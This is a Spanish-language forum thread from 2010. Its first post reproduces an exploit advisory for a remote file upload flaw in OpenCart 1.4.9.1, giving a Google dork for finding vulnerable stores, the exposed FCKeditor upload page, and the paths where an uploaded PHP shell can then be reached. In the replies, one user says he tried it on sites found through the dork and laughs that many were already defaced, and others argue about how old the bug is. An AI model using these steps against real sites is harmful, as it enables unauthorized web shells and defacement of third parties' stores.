Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: juh en 20 Septiembre 2010, 07:27 am


Título: Opencart 1.4.9.1 Remote File Upload Vulnerability
Publicado por: juh en 20 Septiembre 2010, 07:27 am
Código:
==========================================
Opencart remote file Upload Vulnerability
==========================================
 
#Exploit Title: Opencart remote file uploade
#Author: Net.Edit0r
#Email: Net.Edit0r@Att.Net ~ Black.Hat.tm@Gmail.com
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php
 
######################################Iranian HackerZ####################################
 
# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Example site: http://server
# Select the "File Upload" To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php
 
######################################Demo Example####################################
 
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
 
#########################################################################################
 
#Spical Thanks To >> Darkcoder ~ Classic ~ Jenne bamaram ~ S3Ri0uS ~
_AriaNet_ And All B0x ((Web : ( http://houseofhackers.net/forum/ )))
 
########################################## End ##########################################

Título: Re: Opencart 1.4.9.1 Remote File Upload Vulnerability
Publicado por: tragantras en 23 Septiembre 2010, 11:49 am
jajaja fui a probar el bug este usando un dork de google, y hasta en la página 7 u 8 de los resultados, ya estaban defaceadas por lo menos el 50% de ellas, es increible, los mass defacementes están que arden xDD

Título: Re: Opencart 1.4.9.1 Remote File Upload Vulnerability
Publicado por: Darioxhcx en 23 Septiembre 2010, 17:19 pm
Cita de: tragantras en 23 Septiembre 2010, 11:49 am
jajaja fui a probar el bug este usando un dork de google, y hasta en la página 7 u 8 de los resultados, ya estaban defaceadas por lo menos el 50% de ellas, es increible, los mass defacementes están que arden xDD
na , los petes estan a la espera de un bug para empezar a boludear
digamos que roban informacion por lo menos , ni eso .___.

esto es re viejo
yo lo encontre hace tiempo , y hice un dork , despues cuando busque en google mire que ya habia un paper en milw0rm

buscando link ;P

Título: Re: Opencart 1.4.9.1 Remote File Upload Vulnerability
Publicado por: tragantras en 24 Septiembre 2010, 11:10 am
esta vuln salió hace 4 o 5 dias, quizáhace itempo saliese otra parecida, pero esta es reciente.

Título: Re: Opencart 1.4.9.1 Remote File Upload Vulnerability
Publicado por: Darioxhcx en 24 Septiembre 2010, 17:30 pm
Cita de: tragantras en 24 Septiembre 2010, 11:10 am
esta vuln salió hace 4 o 5 dias, quizáhace itempo saliese otra parecida, pero esta es reciente.
wtf
supongamos que recien la suben a exploit.db , eso no quiere decir que sea nueva


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines